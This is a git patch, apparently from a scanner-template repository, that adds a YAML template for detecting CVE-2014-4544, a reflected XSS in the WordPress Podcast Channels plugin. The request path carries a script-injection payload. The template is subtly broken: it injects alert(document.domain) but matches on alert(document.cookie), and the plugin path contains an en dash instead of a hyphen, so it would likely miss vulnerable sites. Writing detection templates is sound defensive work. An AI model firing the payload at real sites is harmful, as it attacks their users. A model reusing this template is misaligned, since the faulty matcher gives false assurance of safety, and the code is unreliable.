From ae58e1e6129dfa5de121d8254d39c241bc83c480 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sat, 25 Sep 2021 07:49:53 +0700
Subject: [PATCH] Create CVE-2014-4544.yaml

---
 cves/2014/CVE-2014-4544.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2014/CVE-2014-4544.yaml

diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
new file mode 100644
index 0000000000..a8380ef6d9
--- /dev/null
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4544
+
+info:
+  name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'><script>alert(document.cookie)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200